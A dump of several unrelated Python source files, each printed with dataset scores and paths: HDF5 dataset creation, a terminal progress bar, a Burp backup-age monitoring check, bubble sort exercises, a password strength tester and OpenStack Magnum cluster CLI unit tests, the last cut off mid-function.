existing_keys[key.upper()] = value
with open(self.keyvalues_p, "w") as f:
for key, value in existing_keys.items():
f.write(key + "=" + value + "\n")
# ------------------------------------------------------------------------------------------------------------------
def remove_key_value_pairs(self,
keys):
"""
Removes key value pairs from the keyvalues metadata file.
:param keys:
The list of keys to remove.
:return:
Nothing.
"""
self._verify_asset_dir_exists()
assert type(keys) is list
for i in range(len(keys)):
keys[i] = keys[i].upper()
existing_key_value_pairs = self.get_key_value_pairs()
with open(self.keyvalues_p, "w") as f:
for existing_key, value in existing_key_value_pairs.items():
if existing_key.strip().upper() not in keys:
f.write(existing_key.strip().upper() + "=" + value + "\n")
# ------------------------------------------------------------------------------------------------------------------
def get_key_value_pairs(self):
"""
Returns a dictionary of key value pairs from the keyvalues metadata file.
:return:
A dictionary of key value pairs.
"""
self._verify_key_value_file_exists()
with open(self.keyvalues_p, "r") as f:
lines = f.readlines()
output = dict()
for line in lines:
output[line.split("=", 1)[0]] = line.split("=", 1)[1].rstrip()
return output | 0.63023 | 0.269314 |
import h5py
import numpy as np
from multiprocess import cpu_count, Pool
from concurrent.futures import ThreadPoolExecutor
import os
from functools import partial
from tqdm import tqdm
from .features import Feature
from .crud import _add, _load, H5_NONE, SRC_KEY, apply_and_store
from .utils import flatten_dict
__all__ = [
"_create",
'_compute',
]
class SerialExecutor:
def map(self, func, iterable):
return map(func, iterable)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return
def close(self):
pass
def join(self):
pass
def get_executor(n_workers=cpu_count(), parallelism='mp'):
if parallelism == 'mp':
executor = Pool(n_workers)
elif parallelism == 'threads':
executor = ThreadPoolExecutor(n_workers)
elif parallelism == 'none':
executor = SerialExecutor()
else:
raise ValueError(f"parallelism must be one of ['mp', 'threads', 'none']. Got '{parallelism}'")
return executor
def _create(cls,
filename,
sources,
mode="w",
schema={},
n_workers=cpu_count(),
parallelism='mp',
keep_open=False,
**h5_kwargs
):
if not schema:
# get schema from the class attributes
schema = {attr: val for attr, val in cls.__dict__.items() if isinstance(val, Feature)}
if not schema:
raise ValueError("schema cannot be empty. Either provide one to create()"
" or attach Feature attributes to this class.")
# avoid blocking errors from h5py
if os.path.exists(filename) and mode == 'w':
os.remove(filename)
f = h5py.File(filename, mode, **h5_kwargs)
f.require_group(SRC_KEY)
# create groups from schema and write attrs
groups = {key: f.create_group(key) if key not in f else f[key] for key in schema.keys()}
for key, grp in groups.items():
for k, v in schema[key].attrs.items():
grp.attrs[k] = v if v is not None else H5_NONE
f.flush()
# initialize ds_kwargs from schema
ds_kwargs = {key: getattr(feature, "__ds_kwargs__", {}).copy() for key, feature in schema.items()}
# get flavour of parallelism
try:
executor = get_executor(n_workers, parallelism)
except ValueError as e:
f.close()
raise e
# run loading routine
n_sources = len(sources)
batch_size = n_workers * 1
refed_paths = set()
for i in tqdm(range(1 + n_sources // batch_size), leave=False):
start_loc = max([i * batch_size, 0])
end_loc = min([(i + 1) * batch_size, n_sources])
this_sources = sources[start_loc:end_loc]
try:
results = executor.map(partial(_load, schema=schema, guard_func=Feature.load), this_sources)
except Exception as e:
f.close()
if mode == "w":
os.remove(filename)
if parallelism == 'mp':
executor.terminate()
raise e
# write results
for n, res in enumerate(results):
if not res:
continue
res = flatten_dict(res)
_add.source(f, this_sources[n], res, ds_kwargs, refed_paths)
refed_paths = refed_paths | set(res.keys())
f.flush()
if parallelism == 'mp':
executor.close()
executor.join()
# run after_create
db = cls(filename, mode="r+", keep_open=False)
for key, feature in schema.items():
if getattr(type(feature), "after_create", Feature.after_create) != Feature.after_create:
feature.after_create(db, key)
f.flush()
# voila!
return cls(filename, mode if mode != 'w' else "r+", keep_open)
def _compute(fdict, proxy, parallelism, n_workers, destination):
sources = [src for src in proxy.owner.__src__.id[proxy.refs[:].astype(np.bool)]]
executor = get_executor(n_workers, parallelism)
n_sources = len(sources)
batch_size = n_workers * 1
for i in tqdm(range(1 + n_sources // batch_size), leave=False):
start_loc = max([i * batch_size, 0])
end_loc = min([(i + 1) * batch_size, n_sources])
this_sources = sources[start_loc:end_loc]
if parallelism in ('mp', 'none'):
res = executor.map(partial(apply_and_store, fdict=fdict, proxy=proxy), this_sources)
elif parallelism == 'threads':
res = executor.map(partial(apply_and_store, fdict=fdict, proxy=proxy), this_sources)
else:
raise NotImplementedError
for src, r in res:
destination.add(src, r)
if parallelism == 'mp':
executor.close()
executor.join()
return | h5mapper/create.py | import h5py
import numpy as np
from multiprocess import cpu_count, Pool
from concurrent.futures import ThreadPoolExecutor
import os
from functools import partial
from tqdm import tqdm
from .features import Feature
from .crud import _add, _load, H5_NONE, SRC_KEY, apply_and_store
from .utils import flatten_dict
__all__ = [
"_create",
'_compute',
]
class SerialExecutor:
def map(self, func, iterable):
return map(func, iterable)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return
def close(self):
pass
def join(self):
pass
def get_executor(n_workers=cpu_count(), parallelism='mp'):
if parallelism == 'mp':
executor = Pool(n_workers)
elif parallelism == 'threads':
executor = ThreadPoolExecutor(n_workers)
elif parallelism == 'none':
executor = SerialExecutor()
else:
raise ValueError(f"parallelism must be one of ['mp', 'threads', 'none']. Got '{parallelism}'")
return executor
def _create(cls,
filename,
sources,
mode="w",
schema={},
n_workers=cpu_count(),
parallelism='mp',
keep_open=False,
**h5_kwargs
):
if not schema:
# get schema from the class attributes
schema = {attr: val for attr, val in cls.__dict__.items() if isinstance(val, Feature)}
if not schema:
raise ValueError("schema cannot be empty. Either provide one to create()"
" or attach Feature attributes to this class.")
# avoid blocking errors from h5py
if os.path.exists(filename) and mode == 'w':
os.remove(filename)
f = h5py.File(filename, mode, **h5_kwargs)
f.require_group(SRC_KEY)
# create groups from schema and write attrs
groups = {key: f.create_group(key) if key not in f else f[key] for key in schema.keys()}
for key, grp in groups.items():
for k, v in schema[key].attrs.items():
grp.attrs[k] = v if v is not None else H5_NONE
f.flush()
# initialize ds_kwargs from schema
ds_kwargs = {key: getattr(feature, "__ds_kwargs__", {}).copy() for key, feature in schema.items()}
# get flavour of parallelism
try:
executor = get_executor(n_workers, parallelism)
except ValueError as e:
f.close()
raise e
# run loading routine
n_sources = len(sources)
batch_size = n_workers * 1
refed_paths = set()
for i in tqdm(range(1 + n_sources // batch_size), leave=False):
start_loc = max([i * batch_size, 0])
end_loc = min([(i + 1) * batch_size, n_sources])
this_sources = sources[start_loc:end_loc]
try:
results = executor.map(partial(_load, schema=schema, guard_func=Feature.load), this_sources)
except Exception as e:
f.close()
if mode == "w":
os.remove(filename)
if parallelism == 'mp':
executor.terminate()
raise e
# write results
for n, res in enumerate(results):
if not res:
continue
res = flatten_dict(res)
_add.source(f, this_sources[n], res, ds_kwargs, refed_paths)
refed_paths = refed_paths | set(res.keys())
f.flush()
if parallelism == 'mp':
executor.close()
executor.join()
# run after_create
db = cls(filename, mode="r+", keep_open=False)
for key, feature in schema.items():
if getattr(type(feature), "after_create", Feature.after_create) != Feature.after_create:
feature.after_create(db, key)
f.flush()
# voila!
return cls(filename, mode if mode != 'w' else "r+", keep_open)
def _compute(fdict, proxy, parallelism, n_workers, destination):
sources = [src for src in proxy.owner.__src__.id[proxy.refs[:].astype(np.bool)]]
executor = get_executor(n_workers, parallelism)
n_sources = len(sources)
batch_size = n_workers * 1
for i in tqdm(range(1 + n_sources // batch_size), leave=False):
start_loc = max([i * batch_size, 0])
end_loc = min([(i + 1) * batch_size, n_sources])
this_sources = sources[start_loc:end_loc]
if parallelism in ('mp', 'none'):
res = executor.map(partial(apply_and_store, fdict=fdict, proxy=proxy), this_sources)
elif parallelism == 'threads':
res = executor.map(partial(apply_and_store, fdict=fdict, proxy=proxy), this_sources)
else:
raise NotImplementedError
for src, r in res:
destination.add(src, r)
if parallelism == 'mp':
executor.close()
executor.join()
return | 0.357343 | 0.184768 |
import sys
import time
class ProgressBar:
def __init__(self, bar_length, total_steps, unit, lines_subplot):
self.bar_length = bar_length
self.total_steps = total_steps
self.unit = unit
self.lines_subplot = lines_subplot
def _up(self, step=1):
# My terminal breaks if we don't flush after the escape-code
for i in range(step):
sys.stdout.write('\x1b[1A')
sys.stdout.flush()
def _down(self, step=1):
# I could use '\x1b[1B' here, but newline is faster and easier
for i in range(step):
sys.stdout.write('\n')
sys.stdout.flush()
def _clear_line(self):
sys.stdout.write("\033[K")
def _print_status(self, step, summary = ""):
self._clear_line()
print("Evaluating %s %d of %d" % (self.unit, step, self.total_steps))
self._clear_line()
print(summary)
def _print_bar(self, percent):
arrow = '*' * int(percent / 100 * self.bar_length)
spaces = ' ' * (self.bar_length - len(arrow))
print('%3d %% [%s%s]' % (percent, arrow, spaces), end='\r')
def start(self):
curr_step = 0
percent = 0
self._print_status(curr_step, "Start benchmark")
self._print_bar(percent)
def end(self):
curr_step = self.total_steps
percent = 100
self._print_status(curr_step, "Finished benchmark")
self._print_bar(percent)
for i in range(1 + self.lines_subplot):
sys.stdout.write('\n')
sys.stdout.flush()
def update(self, curr_step, summary):
percent = int(100 * (curr_step - 1) / self.total_steps)
self._print_status(curr_step, summary)
self._print_bar(percent)
def jump_main_to_sub_plot(self):
self._down(1)
def jump_sub_to_main_plot(self):
self._up((1 + self.lines_subplot))
def flash(self):
sys.stdout.write('\x1b[1A\x1b[1A')
sys.stdout.flush()
self._clear_line() | se_tools/benchmark_scripts/_progress_bar.py |
import sys
import time
class ProgressBar:
def __init__(self, bar_length, total_steps, unit, lines_subplot):
self.bar_length = bar_length
self.total_steps = total_steps
self.unit = unit
self.lines_subplot = lines_subplot
def _up(self, step=1):
# My terminal breaks if we don't flush after the escape-code
for i in range(step):
sys.stdout.write('\x1b[1A')
sys.stdout.flush()
def _down(self, step=1):
# I could use '\x1b[1B' here, but newline is faster and easier
for i in range(step):
sys.stdout.write('\n')
sys.stdout.flush()
def _clear_line(self):
sys.stdout.write("\033[K")
def _print_status(self, step, summary = ""):
self._clear_line()
print("Evaluating %s %d of %d" % (self.unit, step, self.total_steps))
self._clear_line()
print(summary)
def _print_bar(self, percent):
arrow = '*' * int(percent / 100 * self.bar_length)
spaces = ' ' * (self.bar_length - len(arrow))
print('%3d %% [%s%s]' % (percent, arrow, spaces), end='\r')
def start(self):
curr_step = 0
percent = 0
self._print_status(curr_step, "Start benchmark")
self._print_bar(percent)
def end(self):
curr_step = self.total_steps
percent = 100
self._print_status(curr_step, "Finished benchmark")
self._print_bar(percent)
for i in range(1 + self.lines_subplot):
sys.stdout.write('\n')
sys.stdout.flush()
def update(self, curr_step, summary):
percent = int(100 * (curr_step - 1) / self.total_steps)
self._print_status(curr_step, summary)
self._print_bar(percent)
def jump_main_to_sub_plot(self):
self._down(1)
def jump_sub_to_main_plot(self):
self._up((1 + self.lines_subplot))
def flash(self):
sys.stdout.write('\x1b[1A\x1b[1A')
sys.stdout.flush()
self._clear_line() | 0.279042 | 0.198569 |
# https://github.com/regilero/check_burp_backup_age
# check_burp_backup_age: Local check, Check freshness of last backup for
# a given host name.
import sys
import os
import argparse
import time
import datetime
class CheckBurp(object):
def __init__(self):
self._program = "check_burp_backup_age"
self._version = "0.1"
self._author = "<NAME> (regilero)"
self._nick = "BURP"
self._ok = 0
self._warning = 1
self._critical = 2
self._unknown = 3
self._pending = 4
self.args = None
self.diff_min = None
def critical(self, msg):
print '{0} CRITICAL - {1}'.format(self._nick, msg)
sys.exit(self._critical)
def warning(self, msg):
print '{0} WARNING - {1}'.format(self._nick, msg)
sys.exit(self._warning)
def unknown(self, msg):
print '{0} UNKNOWN - {1}'.format(self._nick, msg)
sys.exit(self._unknown)
def ok(self, msg):
print '{0} OK - {1}'.format(self._nick, msg)
sys.exit(self._ok)
def opt_parser(self):
parser = argparse.ArgumentParser(
prog=self._program,
description=("Local check, Check freshness of last backup for a "
"given host name.\n\nRunning on the backup server "
"this program will check the timestamp file of the "
"last backup for a given host and get the age of this"
" last successful run. This age is then compared to "
"thresolds to generate alerts."),
epilog=("Note that this is a local check, running on the backup "
"server.\nSo the hostname argument is not used to perform"
" any distant connection.\n"))
parser.add_argument('-v', '--version',
version='%(prog)s {0}'.format(self._version),
action='version', help='show program version')
parser.add_argument('-H', '--hostname', required=True, nargs='?',
help=('hostname (directory name for burp) '
'[default: %(default)s]'))
parser.add_argument('-d', '--directory', default='/backups', nargs='?',
help=('base directory path for backups (where are '
'the backups?) [default: %(default)s]'))
parser.add_argument('-w', '--warning', default=1560, const=1560,
type=int, nargs='?',
help=('Warning thresold, time in minutes before '
'going to warning [default: %(default)s]'))
parser.add_argument('-c', '--critical', default=1800, const=1800,
type=int, nargs='?',
help=('Critical thresold, time in minutes before '
'going to critical [default: %(default)s]'))
self.args = vars(parser.parse_args())
if self.args['warning'] >= self.args['critical']:
self.unknown(('Warning thresold ({0}) should be lower than the '
'critical one ({1})').format(self.args['warning'],
self.args['critical']))
self.bckpdir = self.args['directory'] + '/' + self.args['hostname']
self.bckpdircur = self.bckpdir + '/current'
self.ftimestamp = self.bckpdircur + '/timestamp'
def test_backup_dirs(self):
if not os.path.isdir(self.args['directory']):
self.critical(('Base backup directory {0}'
' does not exists').format(self.args['directory']))
if not os.path.isdir(self.bckpdir):
self.critical(('Host backup directory {0}'
' does not exists').format(self.bckpdir))
if not os.path.isdir(self.bckpdircur):
self.critical(('Current Host backup directory {0}'
' does not exists').format(self.bckpdircur))
def read_backup_timestamp(self):
if not os.path.isfile(self.ftimestamp):
self.critical(('timestamp file '
'does not exists ({0})').format(self.ftimestamp))
lines = []
with open(self.ftimestamp) as f:
lines = f.readlines()
if not len(lines):
self.critical(('timestamp file seems'
' to be empty ({0})').format(self.ftimestamp))
tline = lines.pop()
parts = tline.split()
if len(parts) not in [3, 4]:
self.critical(('invalid syntax in '
'timestamp file ({0})').format(self.ftimestamp))
btime = time.strptime(parts[1] + ' ' + parts[2], "%Y-%m-%d %H:%M:%S")
btime = datetime.datetime(*btime[:6])
ctime = time.localtime()
ctime = datetime.datetime(*ctime[:6])
diff = ctime-btime
self.diff_min = int((diff.seconds + (diff.days * 24 * 3600))/60)
self.diff_human = ('{0} day(s) {1:02d} hour(s) {2:02d} '
'minute(s)').format(diff.days,
diff.seconds//3600,
(diff.seconds//60) % 60)
def test_thresolds(self):
if self.diff_min >= self.args['warning']:
if self.diff_min >= self.args['critical']:
self.critical(('Last backup is too old: '
'{0} ({1}>={2})').format(self.diff_human,
self.diff_min,
self.args['critical']))
else:
self.warning(('Last backup starts to get old: '
'{0} ({1}>={2})').format(self.diff_human,
self.diff_min,
self.args['warning']))
else:
self.ok(('Last backup is fresh enough: '
'{0} ({1}<{2})').format(self.diff_human,
self.diff_min,
self.args['warning']))
def run(self):
self.opt_parser()
self.test_backup_dirs()
self.read_backup_timestamp()
self.test_thresolds()
self.unknown('No exit made before end of check, this is not normal.')
def main():
try:
check_burp = CheckBurp()
check_burp.run()
except Exception, e:
print 'Unknown error UNKNOW - {0}'.format(e)
sys.exit(3)
if __name__ == "__main__":
main() | localsettings_monitoring/files/check_burp_backup_age.py |
# https://github.com/regilero/check_burp_backup_age
# check_burp_backup_age: Local check, Check freshness of last backup for
# a given host name.
import sys
import os
import argparse
import time
import datetime
class CheckBurp(object):
def __init__(self):
self._program = "check_burp_backup_age"
self._version = "0.1"
self._author = "<NAME> (regilero)"
self._nick = "BURP"
self._ok = 0
self._warning = 1
self._critical = 2
self._unknown = 3
self._pending = 4
self.args = None
self.diff_min = None
def critical(self, msg):
print '{0} CRITICAL - {1}'.format(self._nick, msg)
sys.exit(self._critical)
def warning(self, msg):
print '{0} WARNING - {1}'.format(self._nick, msg)
sys.exit(self._warning)
def unknown(self, msg):
print '{0} UNKNOWN - {1}'.format(self._nick, msg)
sys.exit(self._unknown)
def ok(self, msg):
print '{0} OK - {1}'.format(self._nick, msg)
sys.exit(self._ok)
def opt_parser(self):
parser = argparse.ArgumentParser(
prog=self._program,
description=("Local check, Check freshness of last backup for a "
"given host name.\n\nRunning on the backup server "
"this program will check the timestamp file of the "
"last backup for a given host and get the age of this"
" last successful run. This age is then compared to "
"thresolds to generate alerts."),
epilog=("Note that this is a local check, running on the backup "
"server.\nSo the hostname argument is not used to perform"
" any distant connection.\n"))
parser.add_argument('-v', '--version',
version='%(prog)s {0}'.format(self._version),
action='version', help='show program version')
parser.add_argument('-H', '--hostname', required=True, nargs='?',
help=('hostname (directory name for burp) '
'[default: %(default)s]'))
parser.add_argument('-d', '--directory', default='/backups', nargs='?',
help=('base directory path for backups (where are '
'the backups?) [default: %(default)s]'))
parser.add_argument('-w', '--warning', default=1560, const=1560,
type=int, nargs='?',
help=('Warning thresold, time in minutes before '
'going to warning [default: %(default)s]'))
parser.add_argument('-c', '--critical', default=1800, const=1800,
type=int, nargs='?',
help=('Critical thresold, time in minutes before '
'going to critical [default: %(default)s]'))
self.args = vars(parser.parse_args())
if self.args['warning'] >= self.args['critical']:
self.unknown(('Warning thresold ({0}) should be lower than the '
'critical one ({1})').format(self.args['warning'],
self.args['critical']))
self.bckpdir = self.args['directory'] + '/' + self.args['hostname']
self.bckpdircur = self.bckpdir + '/current'
self.ftimestamp = self.bckpdircur + '/timestamp'
def test_backup_dirs(self):
if not os.path.isdir(self.args['directory']):
self.critical(('Base backup directory {0}'
' does not exists').format(self.args['directory']))
if not os.path.isdir(self.bckpdir):
self.critical(('Host backup directory {0}'
' does not exists').format(self.bckpdir))
if not os.path.isdir(self.bckpdircur):
self.critical(('Current Host backup directory {0}'
' does not exists').format(self.bckpdircur))
def read_backup_timestamp(self):
if not os.path.isfile(self.ftimestamp):
self.critical(('timestamp file '
'does not exists ({0})').format(self.ftimestamp))
lines = []
with open(self.ftimestamp) as f:
lines = f.readlines()
if not len(lines):
self.critical(('timestamp file seems'
' to be empty ({0})').format(self.ftimestamp))
tline = lines.pop()
parts = tline.split()
if len(parts) not in [3, 4]:
self.critical(('invalid syntax in '
'timestamp file ({0})').format(self.ftimestamp))
btime = time.strptime(parts[1] + ' ' + parts[2], "%Y-%m-%d %H:%M:%S")
btime = datetime.datetime(*btime[:6])
ctime = time.localtime()
ctime = datetime.datetime(*ctime[:6])
diff = ctime-btime
self.diff_min = int((diff.seconds + (diff.days * 24 * 3600))/60)
self.diff_human = ('{0} day(s) {1:02d} hour(s) {2:02d} '
'minute(s)').format(diff.days,
diff.seconds//3600,
(diff.seconds//60) % 60)
def test_thresolds(self):
if self.diff_min >= self.args['warning']:
if self.diff_min >= self.args['critical']:
self.critical(('Last backup is too old: '
'{0} ({1}>={2})').format(self.diff_human,
self.diff_min,
self.args['critical']))
else:
self.warning(('Last backup starts to get old: '
'{0} ({1}>={2})').format(self.diff_human,
self.diff_min,
self.args['warning']))
else:
self.ok(('Last backup is fresh enough: '
'{0} ({1}<{2})').format(self.diff_human,
self.diff_min,
self.args['warning']))
def run(self):
self.opt_parser()
self.test_backup_dirs()
self.read_backup_timestamp()
self.test_thresolds()
self.unknown('No exit made before end of check, this is not normal.')
def main():
try:
check_burp = CheckBurp()
check_burp.run()
except Exception, e:
print 'Unknown error UNKNOW - {0}'.format(e)
sys.exit(3)
if __name__ == "__main__":
main() | 0.326271 | 0.21214 |
import random
import timeit
import random
# sort the given list
# first of all create test samples
test0 = {'input_list': [0, 2, 3, -5, 23, -42],
'output_list': [-42, -5, 0, 2, 3, 23]}
test1 = {'input_list': [3, 5, 6, 8, 9, 10, 99],
'output_list': [3, 5, 6, 8, 9, 10, 99]}
test2 = {'input_list': [99, 10, 9, 8, 6, 5, 3],
'output_list': [3, 5, 6, 8, 9, 10, 99]}
test3 = {'input_list': [5, -12, 2, 6, 1, 23, 7, 7, -12, 6, 12, 1, -243, 1, 0],
'output_list': [-243, -12, -12, 0, 1, 1, 1, 2, 5, 6, 6, 7, 7, 12, 23]}
test4 = {'input_list': [],
'output_list': []}
test5 = {'input_list': [14],
'output_list': [14]}
test6 = {'input_list': [[42, 42, 42, 42, 42, 42, 42]],
'output_list': [[42, 42, 42, 42, 42, 42, 42]]}
in_list = list(range(100))
out_list = list(range(100))
random.shuffle(in_list)
test7 = {'input_list': in_list,
'output_list': out_list}
tests = [test0, test1, test2, test3, test4, test5, test6, test7]
def bubble_sort(g_list: list) -> list:
# copy of the list to avoid changing it!!!
g_list_copy = g_list
while True:
for x in range(len(g_list_copy) - 1):
if x+1 == len(g_list_copy):
continue
if g_list_copy[x] > g_list_copy[x+1]:
g_list_copy[x], g_list_copy[x+1] = g_list_copy[x+1], g_list_copy[x]
# print(g_list)
# print(g_list_copy)
if g_list_copy == sorted(g_list_copy):
return g_list_copy
bubble_sort(test2['input_list'])
print(bubble_sort(test2['input_list']) == test2['output_list'])
def bubble_sort2(nums):
# Create a copy of the list, to avoid changing it
nums = list(nums)
# print('bubble_sort', nums)
# 4. Repeat the process n-1 times
for j in range(len(nums) - 1):
# print('iteration', j)
# 1. Iterate over the array (except last element)
for i in range(len(nums) - 1):
# print('i', i, nums[i], nums[i+1])
# 2. Compare the number with
if nums[i] > nums[i + 1]:
# 3. Swap the two elements
nums[i], nums[i + 1] = nums[i + 1], nums[i]
# print(nums)
# Return the sorted list
return nums
bubble_sort2(test3['input_list'])
print(bubble_sort2(test3['input_list']) == test3['output_list']) | bubble_sort/bubble_sort_exercise.py | import random
import timeit
import random
# sort the given list
# first of all create test samples
test0 = {'input_list': [0, 2, 3, -5, 23, -42],
'output_list': [-42, -5, 0, 2, 3, 23]}
test1 = {'input_list': [3, 5, 6, 8, 9, 10, 99],
'output_list': [3, 5, 6, 8, 9, 10, 99]}
test2 = {'input_list': [99, 10, 9, 8, 6, 5, 3],
'output_list': [3, 5, 6, 8, 9, 10, 99]}
test3 = {'input_list': [5, -12, 2, 6, 1, 23, 7, 7, -12, 6, 12, 1, -243, 1, 0],
'output_list': [-243, -12, -12, 0, 1, 1, 1, 2, 5, 6, 6, 7, 7, 12, 23]}
test4 = {'input_list': [],
'output_list': []}
test5 = {'input_list': [14],
'output_list': [14]}
test6 = {'input_list': [[42, 42, 42, 42, 42, 42, 42]],
'output_list': [[42, 42, 42, 42, 42, 42, 42]]}
in_list = list(range(100))
out_list = list(range(100))
random.shuffle(in_list)
test7 = {'input_list': in_list,
'output_list': out_list}
tests = [test0, test1, test2, test3, test4, test5, test6, test7]
def bubble_sort(g_list: list) -> list:
# copy of the list to avoid changing it!!!
g_list_copy = g_list
while True:
for x in range(len(g_list_copy) - 1):
if x+1 == len(g_list_copy):
continue
if g_list_copy[x] > g_list_copy[x+1]:
g_list_copy[x], g_list_copy[x+1] = g_list_copy[x+1], g_list_copy[x]
# print(g_list)
# print(g_list_copy)
if g_list_copy == sorted(g_list_copy):
return g_list_copy
bubble_sort(test2['input_list'])
print(bubble_sort(test2['input_list']) == test2['output_list'])
def bubble_sort2(nums):
# Create a copy of the list, to avoid changing it
nums = list(nums)
# print('bubble_sort', nums)
# 4. Repeat the process n-1 times
for j in range(len(nums) - 1):
# print('iteration', j)
# 1. Iterate over the array (except last element)
for i in range(len(nums) - 1):
# print('i', i, nums[i], nums[i+1])
# 2. Compare the number with
if nums[i] > nums[i + 1]:
# 3. Swap the two elements
nums[i], nums[i + 1] = nums[i + 1], nums[i]
# print(nums)
# Return the sorted list
return nums
bubble_sort2(test3['input_list'])
print(bubble_sort2(test3['input_list']) == test3['output_list']) | 0.118449 | 0.392279 |
import os
import os.path
from StrengthTest import StrengthTest
settings = 'settings.txt'
def prompt(again=None):
yesno = " [Yes/No] "
ask = ""
if again == None:
ask = "Would you like to run the test now?" + yesno
else:
ask = "Would you like to run the test again?" + yesno
response = input(ask)
if response[0].lower() == 'y':
operations()
elif response[0].lower() == 'n':
ask = "Would you like to reconfigure the test settings?" + yesno
response = input(ask)
if response[0].lower() == 'y':
import Setup
prompt()
return
else:
prompt()
def operations():
minLen = 0
maxLen = 0
specChar = None
requires = {}
#read settings file
with open(settings,'r') as file:
for line in file:
spot = line.find(':') + 1
if 'minLength: ' in line:
minLen = line[spot:]
elif 'maxLength: ' in line:
maxLen = line[spot:]
elif 'reqCap: ' in line:
requires['reqCap'] = int(line[spot:])
elif 'reqLow: ' in line:
requires['reqLow'] = int(line[spot:])
elif 'reqNum: ' in line:
requires['reqNum'] = int(line[spot:])
elif 'reqSpec: ' in line:
requires['reqSpec'] = int(line[spot:])
elif 'special: ' in line:
specChar = line[spot:].rstrip()
elif 'DONE' in line:
break;
test = StrengthTest(minLen, maxLen, requires, specChar)
results = test.evaluate(input("Please enter your password: "))
os.system('cls' if os.name=='nt' else 'clear')
outputInfo(results)
prompt(True)
def outputInfo(results):
print("Your password, "
, results['password']
, " is "
, ("" if results['viable'] else "not ")
, "valid.\nScore: "
, results['score']
, "\nTotal possible score: "
, results['max']
, "\nRating: "
, round(results['rating'],2)
, "%\nNotes: "
, results['notes'])
#script
if os.path.isfile(settings):
print("Settings found.\n")
prompt()
else:
print ("No settings file has been detected.\nPerforming first time setup.\n")
import Setup
print ("Setup complete.\n")
prompt() | StrengthTestApp.py |
import os
import os.path
from StrengthTest import StrengthTest
settings = 'settings.txt'
def prompt(again=None):
yesno = " [Yes/No] "
ask = ""
if again == None:
ask = "Would you like to run the test now?" + yesno
else:
ask = "Would you like to run the test again?" + yesno
response = input(ask)
if response[0].lower() == 'y':
operations()
elif response[0].lower() == 'n':
ask = "Would you like to reconfigure the test settings?" + yesno
response = input(ask)
if response[0].lower() == 'y':
import Setup
prompt()
return
else:
prompt()
def operations():
minLen = 0
maxLen = 0
specChar = None
requires = {}
#read settings file
with open(settings,'r') as file:
for line in file:
spot = line.find(':') + 1
if 'minLength: ' in line:
minLen = line[spot:]
elif 'maxLength: ' in line:
maxLen = line[spot:]
elif 'reqCap: ' in line:
requires['reqCap'] = int(line[spot:])
elif 'reqLow: ' in line:
requires['reqLow'] = int(line[spot:])
elif 'reqNum: ' in line:
requires['reqNum'] = int(line[spot:])
elif 'reqSpec: ' in line:
requires['reqSpec'] = int(line[spot:])
elif 'special: ' in line:
specChar = line[spot:].rstrip()
elif 'DONE' in line:
break;
test = StrengthTest(minLen, maxLen, requires, specChar)
results = test.evaluate(input("Please enter your password: "))
os.system('cls' if os.name=='nt' else 'clear')
outputInfo(results)
prompt(True)
def outputInfo(results):
print("Your password, "
, results['password']
, " is "
, ("" if results['viable'] else "not ")
, "valid.\nScore: "
, results['score']
, "\nTotal possible score: "
, results['max']
, "\nRating: "
, round(results['rating'],2)
, "%\nNotes: "
, results['notes'])
#script
if os.path.isfile(settings):
print("Settings found.\n")
prompt()
else:
print ("No settings file has been detected.\nPerforming first time setup.\n")
import Setup
print ("Setup complete.\n")
prompt() | 0.069704 | 0.069668 |
import copy
import mock
import os
import sys
import tempfile
from contextlib import contextmanager
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from mock import call
from magnumclient import exceptions
from magnumclient.osc.v1 import clusters as osc_clusters
from magnumclient.tests.osc.unit.v1 import fakes as magnum_fakes
class TestCluster(magnum_fakes.TestMagnumClientOSCV1):
def setUp(self):
super(TestCluster, self).setUp()
self.clusters_mock = self.app.client_manager.container_infra.clusters
self.certificates_mock = \
self.app.client_manager.container_infra.certificates
class TestClusterCreate(TestCluster):
def setUp(self):
super(TestClusterCreate, self).setUp()
attr = dict()
attr['name'] = 'fake-cluster-1'
self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
self._default_args = {
'cluster_template_id': 'fake-ct',
'create_timeout': 60,
'discovery_url': None,
'keypair': None,
'master_count': 1,
'name': 'fake-cluster-1',
'node_count': 1,
}
self.clusters_mock.create = mock.Mock()
self.clusters_mock.create.return_value = self._cluster
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = copy.deepcopy(self._cluster)
self.clusters_mock.update = mock.Mock()
self.clusters_mock.update.return_value = self._cluster
# Get the command object to test
self.cmd = osc_clusters.CreateCluster(self.app, None)
self.data = tuple(map(lambda x: getattr(self._cluster, x),
osc_clusters.CLUSTER_ATTRIBUTES))
def test_cluster_create_required_args_pass(self):
"""Verifies required arguments."""
arglist = [
'--cluster-template', self._cluster.cluster_template_id,
self._cluster.name
]
verifylist = [
('cluster_template', self._cluster.cluster_template_id),
('name', self._cluster.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.create.assert_called_with(**self._default_args)
def test_cluster_create_missing_required_arg(self):
"""Verifies missing required arguments."""
arglist = [
self._cluster.name
]
verifylist = [
('name', self._cluster.name)
]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
def test_cluster_create_with_labels(self):
"""Verifies labels are properly parsed when given as argument."""
expected_args = self._default_args
expected_args['labels'] = {
'arg1': 'value1', 'arg2': 'value2'
}
arglist = [
'--cluster-template', self._cluster.cluster_template_id,
'--labels', 'arg1=value1',
'--labels', 'arg2=value2',
self._cluster.name
]
verifylist = [
('cluster_template', self._cluster.cluster_template_id),
('labels', ['arg1=value1', 'arg2=value2']),
('name', self._cluster.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.create.assert_called_with(**expected_args)
class TestClusterDelete(TestCluster):
def setUp(self):
super(TestClusterDelete, self).setUp()
self.clusters_mock.delete = mock.Mock()
self.clusters_mock.delete.return_value = None
# Get the command object to test
self.cmd = osc_clusters.DeleteCluster(self.app, None)
def test_cluster_delete_one(self):
arglist = ['foo']
verifylist = [('cluster', ['foo'])]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.delete.assert_called_with('foo')
def test_cluster_delete_multiple(self):
arglist = ['foo', 'bar']
verifylist = [('cluster', ['foo', 'bar'])]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
